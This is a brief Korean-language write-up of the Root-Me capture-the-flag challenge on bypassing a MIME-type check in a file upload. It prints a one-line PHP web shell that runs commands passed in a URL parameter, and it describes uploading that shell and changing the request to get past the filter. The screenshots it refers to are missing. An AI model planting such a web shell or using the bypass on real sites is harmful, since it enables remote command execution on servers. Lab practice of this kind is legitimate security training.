rootme - File upload - MIME type

해당 문제에 접속하면

위와 같은 갤러리가 나옵니다.

<?php

system($_GET[cmd]);

?>

 

똑같은 php코드로 웹쉘을 올리고,

 

필터링을 우회하기위해

 

 

위와 같이 변경해줍니다.

 

그 후 웹쉘을 실행시키면 password 획득이 가능합니다.